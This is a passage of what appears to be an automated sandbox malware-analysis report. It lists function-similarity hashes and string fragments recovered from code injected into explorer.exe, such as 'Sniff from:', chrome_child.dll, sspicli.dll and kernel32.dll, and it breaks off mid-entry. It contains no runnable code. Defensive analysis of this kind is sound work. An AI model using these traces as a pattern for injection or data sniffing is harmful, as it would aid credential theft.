                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: c96a56b92cac654538cff1bcf5e51ae884fce2105fa92e21281f91ac0340d576
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 67515CB0918B4C8BDB55DFA4C045BEEB7F1FF58300F41462EA59AE7214EF70A5418B89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 55384dd20132c66e3af97844be3ebd219ce4a21824c063b904e5010ef625ee98
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: A2515CB4918B4C8BDB55DFA4C045AEAB7E1FF58300F40462EA89AE7214EF70A541DB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 55169ecf93228e841bd17c1c60a9eb76a22d67fca956ee9e400a42d1cbddba01
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: 03417634218B8C8FCBA5EF24D845BEAB3E4FB98301F51462E949EC7250EF30D5498782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 9597195cd30f26580dc3d8394fa87803d5003bc4fdf0403f3fc633ee9882033f
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: A3419534218B4C8FCBA5DF249845BEAB7E5FB99341F41462E985EC7240EF30E90587C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 0c73502685981c8b7c0b6f67ea2a5c64f8a810f0820999c93794db3a710631fd
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: 8F418135218B8C8FCBA5EF2498457EA73E4FB98301F51462EA85ECB245EF34D545CB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: 948c624fa16560832b92511cea6d84b2f267a0b32a1727764cb7ab41da5846ec
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: C5418670A18E0D8FCB98EF58C095BAD73E2FF58300F51456AE80ED7260EA31E9448BC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: c946167a764a6de3eea90e76164e8109d042acb4385a8e944030697e62ef3367
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: A3418F30A18E1D8FCB94EF68C1A57AD77E5FB68304F41466AA90ED7200EE30D940CBC6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: b14daac34de3790cd0fb8eca073499ded144b3357c31e931e12a141fc80f07ef
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: 0941AF35A18E0D8FDB84EF68C4953AE37E1FB68300F40816AA84ED7214DE30D945CF86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 4220a01e4c3b52e40f1468411862ef35f4bafa940b7efdf95c97f99f27bcda1f
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 62419270608B498FD7A9DF2980947AAF7E1FB98300F114B2E949EC7265DB70D949CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: dfcbc9e873ef201b61dda0399aa3726eefd7fb14dfa7e876f51c8ec89aff1cb5
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 3F416F70608B4D8FD7A9DF2884857AABBE5FB98340F104B2FD49AC2255DB70E945CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: a4af9368d6ef7b23e08b68c32a5d03e33f329eb0ace547729cfca6a4b66098cf
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 20418274608B498FD799DF6884843AAB7E1FB98300F204A6E949EC7259DF70D945CF41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 58872e719fb461b616207945e8b6033cbd23a03b5bee2aca66179cc34182c97c
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: CD31E67550CB885FD75ADB28C485ADAB7D4FB84300F50491EE49BCB2A2EE30A54ACB43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 97b791b9a92b2f19222d901574221605efae3ead3e6ebc22dbd084f8ec39d1ed
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: BB31CF7550CB886FD71ADB28C5857EAB7D0FB94300F50491EE49BC7252EE30A64ACB42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: f878d84711fec8a867dd74ccabbac59fdf72b54213b0415dc7da620d78be14e8
                                            • Instruction ID: f63f4dc43ffb642b1d15773dd590cebc249032141b970b7b2240940d8aff5616
                                            • Opcode Fuzzy Hash: f878d84711fec8a867dd74ccabbac59fdf72b54213b0415dc7da620d78be14e8
                                            • Instruction Fuzzy Hash: C431F07550CB88AFD71ADB28C0856EAB7D0FB94300F50491EE49BCB252EE30A54ACF43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 820233154b8a12c9bcb8f355742674056089276586304aded18cb5108af2942a
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 2431D275508F486FD759DB28C485AEAB7E4FB94300F50491EE49BC72A2EE30E54ACB43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 8384a251113718f2030e2bab01dc4fbf54082cc08319c84aeee20e887df279dc
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 8C31C175508B486FD75ADB28C585BEAB7D4FB94300F50491EE49BC7251EE30F60ACA42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: eb65a4bc72e2e2faced016151a06cd003fc52d5f0671ca348bf5022ca6b12604
                                            • Instruction ID: 59d779fa2159d8751b95833c1354ce9d9f5870d84269d37b2d10f00509f5f2f6
                                            • Opcode Fuzzy Hash: eb65a4bc72e2e2faced016151a06cd003fc52d5f0671ca348bf5022ca6b12604
                                            • Instruction Fuzzy Hash: 6C310375508B48AFD31ADB28C485AEEB7D1FB94300F40491EE49BC7246EE30E54ACE43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: 883468a7fc19370ea0aea8a0289a4ef9bf6ecdfe485aa3950711716378e9d662
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 3D317E74218B484FC784EF689495FAAB7E1FBD8300F85467DA84ACB264DF30D949C752
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: f6d7447bf406165bf126b7f12685476f9b28496914e5ce5cddf606a5be4beab6
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 76317C74118B484FCB84EF688696BAAB7E5FF98300F85462DA44ECB215DF30E945C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: 4eb70289bc4454047622506d90fea4a9ef779b7b12dda56dd2db0ad438deaf20
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 8131A478118B588FC784EF6884957AA77E1FF98300F90466DA84ECB258DF30D945CB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 7bc2cda5932b8f61afff178c7dde71da3e03b9cc561c69f369657a9e3bd6a6d9
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 6D318B74218B088FC784DF689495BAAB7E1FFD8300F85463DA84ACB264DF30D909CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: f2a049d2f02c94af5173eb87aea8b99ba11618d1c76a543d7d5b21134341372b
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 1F319E74118B484FCB84EF688695BAAB7E5FFD8300F85463DA44ACB255DF30D905C752
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 4a0976442636ada26c79db850f997bea10b4a86e4b80ec6b36c9d94c34d1a8d3
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9